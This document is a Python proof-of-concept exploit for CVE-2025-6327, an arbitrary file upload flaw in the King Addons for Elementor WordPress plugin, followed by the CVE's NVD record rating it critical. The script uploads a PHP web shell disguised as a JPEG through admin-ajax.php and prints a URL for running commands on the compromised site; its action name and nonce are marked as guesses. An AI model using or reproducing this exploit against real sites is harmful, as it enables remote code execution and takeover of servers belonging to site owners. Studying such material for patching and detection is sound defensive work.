CVE-2025-6327

#!/usr/bin/env python3 """ CVE-2025-6327 PoC - King Addons for Elementor Arbitrary File Upload This PoC demonstrates the file upload vulnerability in King Addons for Elementor plugin. """ import requests import sys import random import string def generate_webshell(): """Generate a simple PHP webshell""" return '<?php system($_GET["cmd"]); ?>' def generate_random_string(length=8): """Generate random string for filename""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def exploit_cve_2025_6327(target_url, webshell_filename=None): """ Exploit for CVE-2025-6327 Args: target_url: Target WordPress site URL webshell_filename: Optional custom filename for the webshell Returns: Uploaded file path if successful, None otherwise """ if webshell_filename is None: webshell_filename = f"{generate_random_string()}.php" # The vulnerable endpoint and parameter may vary # This requires reconnaissance to identify the exact upload endpoint upload_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Prepare the malicious file files = { 'file': (webshell_filename, generate_webshell(), 'image/jpeg') } # The actual parameter name needs to be identified through testing data = { 'action': 'king_addons_upload_file', 'security': 'nonce_value_here' # Nonce may or may not be required } try: print(f"[*] Attempting to upload webshell to {target_url}") print(f"[*] Filename: {webshell_filename}") # Send the upload request response = requests.post( upload_endpoint, files=files, data=data, timeout=30 ) if response.status_code == 200: print(f"[+] Request sent, check response: {response.text}") return webshell_filename else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {str(e)}") return None def main(): if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} https://example.com") sys.exit(1) target = sys.argv[1] result = exploit_cve_2025_6327(target) if result: print(f"\n[!] Exploitation may have succeeded") print(f"[!] Try accessing: {target}/wp-content/uploads/king-addons/{result}?cmd=whoami") else: print(f"\n[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-6327", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:14.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in KingAddons.com King Addons for Elementor king-addons allows Upload a Web Shell to a Web Server.This issue affects King Addons for Elementor: from n/a through <= 51.1.36."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}